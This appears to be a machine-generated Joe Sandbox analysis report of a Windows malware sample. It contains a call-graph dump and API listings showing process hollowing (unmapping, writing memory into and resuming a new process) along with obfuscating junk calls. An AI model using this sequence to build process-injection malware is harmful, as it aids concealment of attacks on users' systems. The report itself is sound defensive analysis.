40d99f 19860->19862 19863 409a7a __calloc_impl 6 API calls 19860->19863 19865 40d9a4 19860->19865 19860->19867 19871 40d8b1 19860->19871 19864 405968 _strcat_s 66 API calls 19862->19864 19863->19860 19864->19865 19866 405968 _strcat_s 66 API calls 19865->19866 19866->19867 19867->19354 19879 406ff9 GetModuleHandleW 19868->19879 19872 40d8bd __mtinitlocknum 19871->19872 19873 40656d __lock 67 API calls 19872->19873 19875 40d8ee __mtinitlocknum 19872->19875 19874 40d8d3 19873->19874 19876 40a281 ___sbh_alloc_block 5 API calls 19874->19876 19875->19860 19877 40d8de 19876->19877 19882 40d8f7 19877->19882 19880 40701d ExitProcess 19879->19880 19881 40700d GetProcAddress 19879->19881 19881->19880 19885 406493 LeaveCriticalSection 19882->19885 19884 40d8fe 19884->19875 19885->19884 19888 40afd4 _memset 19886->19888 19895 40b086 19886->19895 19896 40e2e3 19888->19896 19890 407750 __invoke_watson 5 API calls 19892 40b131 19890->19892 19892->19367 19894 40e0e4 ___crtLCMapStringA 102 API calls 19894->19895 19895->19890 19897 40693c _LocaleUpdate::_LocaleUpdate 77 API calls 19896->19897 19898 40e2f6 19897->19898 19906 40e129 19898->19906 19901 40e0e4 19902 40693c _LocaleUpdate::_LocaleUpdate 77 API calls 19901->19902 19903 40e0f7 19902->19903 19991 40dd3f 19903->19991 19907 40e175 19906->19907 19908 40e14a GetStringTypeW 19906->19908 19909 40e162 19907->19909 19911 40e25c 19907->19911 19908->19909 19910 40e16a GetLastError 19908->19910 19912 40e1ae MultiByteToWideChar 19909->19912 19929 40e256 19909->19929 19910->19907 19934 40febb GetLocaleInfoA 19911->19934 19918 40e1db 19912->19918 19912->19929 19914 407750 __invoke_watson 5 API calls 19916 40b041 19914->19916 19916->19901 19917 40e1f0 _memset ___convertcp 19920 40e229 MultiByteToWideChar 19917->19920 19917->19929 19918->19917 19922 40d900 _malloc 67 API calls 19918->19922 19919 40e2ad GetStringTypeA 19921 40e2c8 19919->19921 19919->19929 19925 40e250 19920->19925 19926 40e23f GetStringTypeW 19920->19926 19927 407e83 
___freetlocinfo 67 API calls 19921->19927 19922->19917 19930 40dd1f 19925->19930 19926->19925 19927->19929 19929->19914 19931 40dd2b 19930->19931 19932 40dd3c 19930->19932 19931->19932 19933 407e83 ___freetlocinfo 67 API calls 19931->19933 19932->19929 19933->19932 19935 40fee9 19934->19935 19936 40feee 19934->19936 19938 407750 __invoke_watson 5 API calls 19935->19938 19965 40503e 19936->19965 19939 40e280 19938->19939 19939->19919 19939->19929 19940 40ff04 19939->19940 19941 40ffce 19940->19941 19942 40ff44 GetCPInfo 19940->19942 19945 407750 __invoke_watson 5 API calls 19941->19945 19943 40ffb9 MultiByteToWideChar 19942->19943 19944 40ff5b 19942->19944 19943->19941 19949 40ff74 _strlen 19943->19949 19944->19943 19946 40ff61 GetCPInfo 19944->19946 19947 40e2a1 19945->19947 19946->19943 19948 40ff6e 19946->19948 19947->19919 19947->19929 19948->19943 19948->19949 19950 40d900 _malloc 67 API calls 19949->19950 19954 40ffa6 _memset ___convertcp 19949->19954 19950->19954 19951 410003 MultiByteToWideChar 19952 41001b 19951->19952 19953 41003a 19951->19953 19956 410022 WideCharToMultiByte 19952->19956 19957 41003f 19952->19957 19955 40dd1f __freea 67 API calls 19953->19955 19954->19941 19954->19951 19955->19941 19956->19953 19958 41004a WideCharToMultiByte 19957->19958 19959 41005e 19957->19959 19958->19953 19958->19959 19960 40ab33 __calloc_crt 67 API calls 19959->19960 19961 410066 19960->19961 19961->19953 19962 41006f WideCharToMultiByte 19961->19962 19962->19953 19963 410081 19962->19963 19964 407e83 ___freetlocinfo 67 API calls 19963->19964 19964->19953 19968 406bf2 19965->19968 19969 406c0b 19968->19969 19972 4069c3 19969->19972 19973 40693c _LocaleUpdate::_LocaleUpdate 77 API calls 19972->19973 19974 4069d8 19973->19974 19975 4069ea 19974->19975 19980 406a27 19974->19980 19976 405968 _strcat_s 67 API calls 19975->19976 19977 4069ef 19976->19977 19978 4081e2 _strcat_s 6 API calls 19977->19978 19983 40504f 19978->19983 19982 406a6c 19980->19982 19984 40b915 
19980->19984 19981 405968 _strcat_s 67 API calls 19981->19983 19982->19981 19982->19983 19983->19935 19985 40693c _LocaleUpdate::_LocaleUpdate 77 API calls 19984->19985 19986 40b929 19985->19986 19987 40b936 19986->19987 19988 40a75c __isleadbyte_l 77 API calls 19986->19988 19987->19980 19989 40b95e 19988->19989 19990 40e2e3 ___crtGetStringTypeA 91 API calls 19989->19990 19990->19987 19992 40dd60 LCMapStringW 19991->19992 19995 40dd7b 19991->19995 19993 40dd83 GetLastError 19992->19993 19992->19995 19993->19995 19994 40df79 19997 40febb ___ansicp 91 API calls 19994->19997 19995->19994 19996 40ddd5 19995->19996 19998 40ddee MultiByteToWideChar 19996->19998 20020 40df70 19996->20020 19999 40dfa1 19997->19999 20004 40de1b 19998->20004 19998->20020 20002 40e095 LCMapStringA 19999->20002 20003 40dfba 19999->20003 19999->20020 20000 407750 __invoke_watson 5 API calls 20001 40b061 20000->20001 20001->19894 20037 40dff1 20002->20037 20005 40ff04 ___convertcp 74 API calls 20003->20005 20008 40d900 _malloc 67 API calls 20004->20008 20017 40de34 ___convertcp 20004->20017 20009 40dfcc 20005->20009 20006 40de6c MultiByteToWideChar 20010 40de85 LCMapStringW 20006->20010 20011 40df67 20006->20011 20007 40e0bc 20018 407e83 ___freetlocinfo 67 API calls 20007->20018 20007->20020 20008->20017 20013 40dfd6 LCMapStringA 20009->20013 20009->20020 20010->20011 20015 40dea6 20010->20015 20014 40dd1f __freea 67 API calls 20011->20014 20012 407e83 ___freetlocinfo 67 API calls 20012->20007 20023 40dff8 20013->20023 20013->20037 20014->20020 20016 40deaf 20015->20016 20022 40ded8 20015->20022 20016->20011 20019 40dec1 LCMapStringW 20016->20019 20017->20006 20017->20020 20018->20020 20019->20011 20020->20000 20021 40df27 LCMapStringW 20024 40df61 20021->20024 20025 40df3f WideCharToMultiByte 20021->20025 20027 40def3 ___convertcp 20022->20027 20029 40d900 _malloc 67 API calls 20022->20029 20026 40d900 _malloc 67 API calls 20023->20026 20028 40e009 _memset ___convertcp 20023->20028 20030 40dd1f 
__freea 67 API calls 20024->20030 20025->20024 20026->20028 20027->20011 20027->20021 20031 40e047 LCMapStringA 20028->20031 20028->20037 20029->20027 20030->20011 20033 40e067 20031->20033 20034 40e063 20031->20034 20035 40ff04 ___convertcp 74 API calls 20033->20035 20036 40dd1f __freea 67 API calls 20034->20036 20035->20034 20036->20037 20037->20007 20037->20012 20039 409b11 20038->20039 20044 409db3 20038->20044 20040 409cfd VirtualFree 20039->20040 20039->20044 20041 409d61 20040->20041 20042 409d70 VirtualFree HeapFree 20041->20042 20041->20044 20048 40d500 20042->20048 20044->19379 20052 406493 LeaveCriticalSection 20045->20052 20047 407ee0 20047->19370 20049 40d518 20048->20049 20050 40d53f __VEC_memcpy 20049->20050 20051 40d547 20049->20051 20050->20051 20051->20044 20052->20047 20054 4064b6 __mtinitlocknum 20053->20054 20055 4064dc 20054->20055 20056 407717 __FF_MSGBANNER 67 API calls 20054->20056 20057 40aaee __malloc_crt 67 API calls 20055->20057 20063 4064ec __mtinitlocknum 20055->20063 20058 4064cb 20056->20058 20059 4064f7 20057->20059 20060 40756c __NMSG_WRITE 67 API calls 20058->20060 20061 40650d 20059->20061 20062 4064fe 20059->20062 20064 4064d2 20060->20064 20066 40656d __lock 67 API calls 20061->20066 20065 405968 _strcat_s 67 API calls 20062->20065 20063->19386 20067 407024 __mtinitlocknum 3 API calls 20064->20067 20065->20063 20068 406514 20066->20068 20067->20055 20069 406548 20068->20069 20070 40651c 20068->20070 20071 407e83 ___freetlocinfo 67 API calls 20069->20071 20079 40aa8e 20070->20079 20073 406539 20071->20073 20083 406564 20073->20083 20074 406527 20074->20073 20075 407e83 ___freetlocinfo 67 API calls 20074->20075 20077 406533 20075->20077 20078 405968 _strcat_s 67 API calls 20077->20078 20078->20073 20086 406750 20079->20086 20081 40aa9a InitializeCriticalSectionAndSpinCount 20082 40aade __mtinitlocknum 20081->20082 20082->20074 20087 406493 LeaveCriticalSection 20083->20087 20085 40656b 20085->20063 20086->20081 20087->20085 
20088->19391 20089 630000 20092 630630 20089->20092 20091 630005 20093 63064c 20092->20093 20095 631577 20093->20095 20098 6305b0 20095->20098 20101 6305dc 20098->20101 20099 6305e2 GetFileAttributesA 20099->20101 20100 63061e 20101->20099 20101->20100 20103 630420 20101->20103 20104 6304f3 20103->20104 20105 6304fa 20104->20105 20106 6304ff CreateWindowExA 20104->20106 20105->20101 20106->20105 20107 630540 PostMessageA 20106->20107 20108 63055f 20107->20108 20108->20105 20110 630110 VirtualAlloc 20108->20110 20111 63016e 20110->20111 20112 630414 20111->20112 20113 63024a CreateProcessA 20111->20113 20112->20108 20113->20112 20114 63025f VirtualFree VirtualAlloc Wow64GetThreadContext 20113->20114 20114->20112 20115 6302a9 ReadProcessMemory 20114->20115 20116 6302e5 VirtualAllocEx NtWriteVirtualMemory 20115->20116 20117 6302d5 NtUnmapViewOfSection 20115->20117 20118 63033b 20116->20118 20117->20116 20119 630350 NtWriteVirtualMemory 20118->20119 20120 63039d WriteProcessMemory Wow64SetThreadContext ResumeThread 20118->20120 20119->20118 20121 6303fb ExitProcess 20120->20121 20123 567b63 20124 567b72 20123->20124 20127 568303 20124->20127 20128 56831e 20127->20128 20129 568327 CreateToolhelp32Snapshot 20128->20129 20130 568343 Module32First 20128->20130 20129->20128 20129->20130 20131 568352 20130->20131 20132 567b7b 20130->20132 20134 567fc2 20131->20134 20135 567fed 20134->20135 20136 567ffe VirtualAlloc 20135->20136 20137 568036 20135->20137 20136->20137 20137->20137 20138 405435 20139 405446 20138->20139 20173 408f76 HeapCreate 20139->20173 20142 405485 20175 408de9 GetModuleHandleW 20142->20175 20146 405496 __RTC_Initialize 20209 408739 20146->20209 20147 4053dd _fast_error_exit 67 API calls 20147->20146 20149 4054a4 20150 4054b0 GetCommandLineW 20149->20150 20152 406fd0 __amsg_exit 67 API calls 20149->20152 20224 4086dc GetEnvironmentStringsW 20150->20224 20154 4054af 20152->20154 20153 4054bf 20230 40862e GetModuleFileNameW 20153->20230 20154->20150 20156 
4054c9 20157 4054d4 20156->20157 20158 406fd0 __amsg_exit 67 API calls 20156->20158 20234 4083ff 20157->20234 20158->20157 20160 4054e5 20247 40708f 20160->20247 20162 406fd0 __amsg_exit 67 API calls 20162->20160 20164 4054ec 20165 406fd0 __amsg_exit 67 API calls 20164->20165 20166 4054f7 __wwincmdln 20164->20166 20165->20166 20253 404830 20166->20253 20169 405526 20270 40726c 20169->20270 20172 40552b __mtinitlocknum 20174 405479 20173->20174 20174->20142 20259 4053dd 20174->20259 20176 408e04 20175->20176 20177 408dfd 20175->20177 20178 408f6c 20176->20178 20179 408e0e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 20176->20179 20180 406fa0 __crt_waiting_on_module_handle 2 API calls 20177->20180 20284 408b03 20178->20284 20182 408e57 TlsAlloc 20179->20182 20181 408e03 20180->20181 20181->20176 20185 40548b 20182->20185 20186 408ea5 TlsSetValue 20182->20186 20185->20146 20185->20147 20186->20185 20187 408eb6 20186->20187 20273 40728a 20187->20273 20190 4089d9 __encode_pointer 6 API calls 20191 408ec6 20190->20191 20192 4089d9 __encode_pointer 6 API calls 20191->20192 20193 408ed6 20192->20193 20194 4089d9 __encode_pointer 6 API calls 20193->20194 20195 408ee6 20194->20195 20196 4089d9 __encode_pointer 6 API calls 20195->20196 20197 408ef6 20196->20197 20280 4063f1 20197->20280 20200 408a54 __decode_pointer 6 API calls 20201 408f17 20200->20201 20201->20178 20202 40ab33 __calloc_crt 67 API calls 20201->20202 20203 408f30 20202->20203 20203->20178 20204 408a54 __decode_pointer 6 API calls 20203->20204 20205 408f4a 20204->20205 20205->20178 20206 408f51 20205->20206 20207 408b40 __initptd 67 API calls 20206->20207 20208 408f59 GetCurrentThreadId 20207->20208 20208->20185 20293 406750 20209->20293 20211 408745 GetStartupInfoA 20212 40ab33 __calloc_crt 67 API calls 20211->20212 20219 408766 20212->20219 20213 408984 __mtinitlocknum 20213->20149 20214 408901 GetStdHandle 20218 4088cb 20214->20218 20215 408966 SetHandleCount 20215->20213 20216 40ab33 
__calloc_crt 67 API calls 20216->20219 20217 408913 GetFileType 20217->20218 20218->20213 20218->20214 20218->20215 20218->20217 20222 40aa8e __mtinitlocknum InitializeCriticalSectionAndSpinCount 20218->20222 20219->20213 20219->20216 20219->20218 20220 40884e 20219->20220 20220->20213 20220->20218 20221 408877 GetFileType 20220->20221 20223 40aa8e __mtinitlocknum InitializeCriticalSectionAndSpinCount 20220->20223 20221->20220 20222->20218 20223->20220 20225 4086f1 20224->20225 20226 4086ed 20224->20226 20227 40aaee __malloc_crt 67 API calls 20225->20227 20226->20153 20228 408712 _realloc 20227->20228 20229 408719 FreeEnvironmentStringsW 20228->20229 20229->20153 20231 408663 _wparse_cmdline 20230->20231 20232 40aaee __malloc_crt 67 API calls 20231->20232 20233 4086a6 _wparse_cmdline 20231->20233 20232->20233 20233->20156 20235 408417 _wcslen 20234->20235 20239 4054da 20234->20239 20236 40ab33 __calloc_crt 67 API calls 20235->20236 20242 40843b _wcslen 20236->20242 20237 4084a0 20238 407e83 ___freetlocinfo 67 API calls 20237->20238 20238->20239 20239->20160 20239->20162 20240 40ab33 __calloc_crt 67 API calls 20240->20242 20241 4084c6 20243 407e83 ___freetlocinfo 67 API calls 20241->20243 20242->20237 20242->20239 20242->20240 20242->20241 20246 408485 20242->20246 20294 40d469 20242->20294 20243->20239 20245 4080ba __invoke_watson 10 API calls 20245->20246 20246->20242 20246->20245 20249 40709d __IsNonwritableInCurrentImage 20247->20249 20303 40bf34 20249->20303 20250 4070bb __initterm_e 20252 4070da __IsNonwritableInCurrentImage __initterm 20250->20252 20307 40bf1d 20250->20307 20252->20164 20254 404ba0 20253->20254 20407 404530 20254->20407 20256 404bc0 20257 404bdc GetCurrentDirectoryA 20256->20257 20258 404bec 20256->20258 20257->20256 20258->20169 20267 407240 20258->20267 20260 4053f0 20259->20260 20261 4053eb 20259->20261 20263 40756c __NMSG_WRITE 67 API calls 20260->20263 20262 407717 __FF_MSGBANNER 67 API calls 20261->20262 20262->20260 20264 4053f8 
20263->20264 20265 407024 __mtinitlocknum 3 API calls 20264->20265 20266 405402 20265->20266 20266->20142 20855 407114 20267->20855 20269 407251 20269->20169 20271 407114 _doexit 67 API calls 20270->20271 20272 407277 20271->20272 20272->20172 20274 408a4b _doexit 6 API calls 20273->20274 20275 407292 __init_pointers __initp_misc_winsig 20274->20275 20290 40bf8e 20275->20290 20278 4089d9 __encode_pointer 6 API calls 20279 4072ce 20278->20279 20279->20190 20281 4063fc 20280->20281 20282 40aa8e __mtinitlocknum InitializeCriticalSectionAndSpinCount 20281->20282 20283 40642a 20281->20283 20282->20281 20283->20178 20283->20200 20285 408b19 20284->20285 20286 408b0d 20284->20286 20288 408b3b 20285->20288 20289 408b2d TlsFree 20285->20289 20287 408a54 __decode_pointer 6 API calls 20286->20287 20287->20285 20288->20288 20289->20288 20291 4089d9 __encode_pointer 6 API calls 20290->20291 20292 4072c4 20291->20292 20292->20278 20293->20211 20295 40d47a 20294->20295 20297 40d481 20294->20297 20295->20297 20300 40d4ad 20295->20300 20296 405968 _strcat_s 67 API calls 20298 40d486 20296->20298 20297->20296 20299 4081e2 _strcat_s 6 API calls 20298->20299 20301 40d495 20299->20301 20300->20301 20302 405968 _strcat_s 67 API calls 20300->20302 20301->20242 20302->20298 20304 40bf3a 20303->20304 20305 4089d9 __encode_pointer 6 API calls 20304->20305 20306 40bf52 20304->20306 20305->20304 20306->20250 20310 40bee1 20307->20310 20309 40bf2a 20309->20252 20311 40beed __mtinitlocknum 20310->20311 20318 40703c 20311->20318 20317 40bf0e __mtinitlocknum 20317->20309 20319 40656d __lock 67 API calls 20318->20319 20320 407043 20319->20320 20321 40bdf6 20320->20321 20322 408a54 __decode_pointer 6 API calls 20321->20322 20323 40be0a 20322->20323 20324 408a54 __decode_pointer 6 API calls 20323->20324 20325 40be1a 20324->20325 20326 40be9d 20325->20326 20341 40f5eb 20325->20341 20338 40bf17 20326->20338 20328 40be84 20329 4089d9 __encode_pointer 6 API calls 20328->20329 20330 40be92 20329->20330 
20333 4089d9 __encode_pointer 6 API calls 20330->20333 20331 40be5c 20331->20326 20335 40ab7f __realloc_crt 73 API calls 20331->20335 20336 40be72 20331->20336 20332 40be38 20332->20328 20332->20331 20354 40ab7f 20332->20354 20333->20326 20335->20336 20336->20326 20337 4089d9 __encode_pointer 6 API calls 20336->20337 20337->20328 20403 407045 20338->20403 20342 40f5f7 __mtinitlocknum 20341->20342 20343 40f624 20342->20343 20344 40f607 20342->20344 20346 40f665 HeapSize 20343->20346 20348 40656d __lock 67 API calls 20343->20348 20345 405968 _strcat_s 67 API calls 20344->20345 20347 40f60c 20345->20347 20350 40f61c __mtinitlocknum 20346->20350 20349 4081e2 _strcat_s 6 API calls 20347->20349 20351 40f634 ___sbh_find_block 20348->20351 20349->20350 20350->20332 20359 40f685 20351->20359 20358 40ab88 20354->20358 20356 40abc7 20356->20331 20357 40aba8 Sleep 20357->20358 20358->20356 20358->20357 20363 40d9ca 20358->20363 20362 406493 LeaveCriticalSection 20359->20362 20361 40f660 20361->20346 20361->20350 20362->20361 20364 40d9d6 __mtinitlocknum 20363->20364 20365 40d9eb 20364->20365 20366 40d9dd 20364->20366 20368 40d9f2 20365->20368 20369 40d9fe 20365->20369 20367 40d900 _malloc 67 API calls 20366->20367 20385 40d9e5 __dosmaperr __mtinitlocknum 20367->20385 20370 407e83 ___freetlocinfo 67 API calls 20368->20370 20377 40db70 20369->20377 20398 40da0b ___sbh_resize_block _realloc ___sbh_find_block 20369->20398 20370->20385 20371 40dba3 20373 409a7a __calloc_impl 6 API calls 20371->20373 20372 40db75 HeapReAlloc 20372->20377 20372->20385 20375 40dba9 20373->20375 20374 40656d __lock 67 API calls 20374->20398 20376 405968 _strcat_s 67 API calls 20375->20376 20376->20385 20377->20371 20377->20372 20378 40dbc7 20377->20378 20379 409a7a __calloc_impl 6 API calls 20377->20379 20382 40dbbd 20377->20382 20380 405968 _strcat_s 67 API calls 20378->20380 20378->20385 20379->20377 20383 40dbd0 GetLastError 20380->20383 20384 405968 _strcat_s 67 API calls 20382->20384 20383->20385 
20387 40db3e 20384->20387 20385->20358 20386 40da96 HeapAlloc 20386->20398 20387->20385 20389 40db43 GetLastError 20387->20389 20388 40daeb HeapReAlloc 20388->20398 20389->20385 20390 40a281 ___sbh_alloc_block 5 API calls 20390->20398 20391 40db56 20391->20385 20393 405968 _strcat_s 67 API calls 20391->20393 20392 409a7a __calloc_impl 6 API calls 20392->20398 20395 40db63 20393->20395 20394 409ad2 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 20394->20398 20395->20383 20395->20385 20396 40db39 20397 405968 _strcat_s 67 API calls 20396->20397 20397->20387 20398->20371 20398->20374 20398->20385 20398->20386 20398->20388 20398->20390 20398->20391 20398->20392 20398->20394 20398->20396 20399 40db0e 20398->20399 20402 406493 LeaveCriticalSection 20399->20402 20401 40db15 20401->20398 20402->20401 20406 406493 LeaveCriticalSection 20403->20406 20405 40704c 20405->20317 20406->20405 20408 404546 SetLastError 20407->20408 20409 404551 20408->20409 20410 40455a 20408->20410 20409->20408 20409->20410 20411 404566 FindNextVolumeMountPointA EnumTimeFormatsW 20410->20411 20432 4045af 20410->20432 20447 404d1d 20411->20447 20412 404616 VirtualAlloc 20417 404650 GetLastError 20412->20417 20413 4045ce GetDllDirectoryW OpenJobObjectA InterlockedExchangeAdd 20415 40503e ___ansicp 91 API calls 20413->20415 20428 4045fb 20415->20428 20417->20417 20423 40465b 20417->20423 20419 40458b 20465 405361 20419->20465 20420 4046f6 20424 404716 LCMapStringA InterlockedIncrement OpenEventW 20420->20424 20426 404747 20420->20426 20422 4046a2 8 API calls 20422->20423 20423->20420 20423->20422 20424->20420 20425 404594 20478 404c00 20425->20478 20440 404420 20426->20440 20428->20412 20430 40474c 20431 40475e GetCurrentProcess 20430->20431 20433 404771 20430->20433 20431->20430 20432->20412 20432->20413 20434 404773 GetLastError 20433->20434 20435 40479a 20433->20435 20434->20433 20436 4047bf GetFileAttributesA GetShortPathNameW SetComputerNameExA FreeEnvironmentStringsW 

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 00404547
                                                                  • FindNextVolumeMountPointA.KERNEL32(00000000,?,00000000), ref: 0040456F
                                                                  • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00404578
                                                                  • _calloc.LIBCMT ref: 00404580
                                                                  • __floor_pentium4.LIBCMT ref: 004045AA
                                                                  • GetDllDirectoryW.KERNEL32(00000000,00000000), ref: 004045D7
                                                                  • OpenJobObjectA.KERNEL32(00000000,00000000,sokum), ref: 004045E4
                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004045EF
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0040463A
                                                                  • GetLastError.KERNEL32 ref: 00404650
                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 004046A6
                                                                  • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004046B4
                                                                  • SetConsoleCP.KERNEL32(00000000), ref: 004046B8
                                                                  • GetSystemDefaultLCID.KERNEL32 ref: 004046BA
                                                                  • OutputDebugStringW.KERNEL32(00000000), ref: 004046BE
                                                                  • GetUserDefaultLangID.KERNEL32 ref: 004046C4
                                                                  • LoadLibraryW.KERNEL32(roxahiramarorada xegesapipojobozomamele kotunacotebak hufobikoxexolavav), ref: 004046CF
                                                                  • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 004046E1
                                                                  • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00404727
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040472D
                                                                  • OpenEventW.KERNEL32(00000000,00000000,himakanesekobajawofehabaluc), ref: 00404738
                                                                  • GetCurrentProcess.KERNEL32 ref: 0040475E
                                                                  • GetLastError.KERNEL32 ref: 00404773
                                                                  • GetFileAttributesA.KERNEL32(rafubajijovisatafesohadiko dibagirosowocutivutiyete jodanevudafuzabasukaropecevemus fuvocarujekahitave kobaxofoboficejonakoropi), ref: 004047C4
                                                                  • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004047D1
                                                                  • SetComputerNameExA.KERNEL32(00000000,kezabohujocozebiwaviracabivolezagecudugefucuhevufofoturulivozevulewiliyudo), ref: 004047DA
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004047DE
                                                                  • GetComputerNameA.KERNEL32(00000000,00000000), ref: 004047E8
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 004047FD
                                                                  • LoadLibraryW.KERNELBASE(msimg32.dll), ref: 0040480E
                                                                  Strings
                                                                  • P, xrefs: 004045FF
                                                                  • kezabohujocozebiwaviracabivolezagecudugefucuhevufofoturulivozevulewiliyudo, xrefs: 004047D3
                                                                  • msimg32.dll, xrefs: 00404809
                                                                  • {, xrefs: 004047AC
                                                                  • himakanesekobajawofehabaluc, xrefs: 0040472F
                                                                  • rafubajijovisatafesohadiko dibagirosowocutivutiyete jodanevudafuzabasukaropecevemus fuvocarujekahitave kobaxofoboficejonakoropi, xrefs: 004047BF
                                                                  • Bq , xrefs: 00404760
                                                                  • roxahiramarorada xegesapipojobozomamele kotunacotebak hufobikoxexolavav, xrefs: 004046CA
                                                                  • sokum, xrefs: 004045DD
                                                                  • ]{, xrefs: 00404781
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$ErrorExchangeLastName$ComputerConsoleDefaultFreeLibraryLoadOpenString$AllocAttributesCurrentDebugDirectoryDiskEnumEnvironmentEventFileFindFormatsIncrementInputLangMountNextObjectOutputPathPointProcessReadShortSpaceStringsSystemTimeUserVirtualVolume__floor_pentium4_calloc
                                                                  • String ID: Bq $]{$himakanesekobajawofehabaluc$kezabohujocozebiwaviracabivolezagecudugefucuhevufofoturulivozevulewiliyudo$msimg32.dll$rafubajijovisatafesohadiko dibagirosowocutivutiyete jodanevudafuzabasukaropecevemus fuvocarujekahitave kobaxofoboficejonakoropi$roxahiramarorada xegesapipojobozomamele kotunacotebak hufobikoxexolavav$sokum${$P

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00630156
                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 00630255
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00630270
                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00630283
                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0063029F
                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 006302C8
                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 006302E3
                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00630304
                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0063032A
                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00630399
                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 006303BF
                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 006303E1
                                                                  • ResumeThread.KERNELBASE(00000000), ref: 006303ED
                                                                  • ExitProcess.KERNEL32(00000000), ref: 00630412
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFreeReadResumeSectionUnmapView
                                                                  • String ID:

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryA.KERNEL32(00000000,?,?,?,394E5926,50EDA421,5B9EF562,32C13229,247B75E2,32C13229,00CF5F12,07B6604B,7A3807E7,07B6604B,5B9EF562,07C50BE0), ref: 00404BE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory
                                                                  • String ID: &YN9$(LE/$Y~o$[fA$rU@${X:$u{$

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0056832B
                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0056834B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                  • String ID:

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
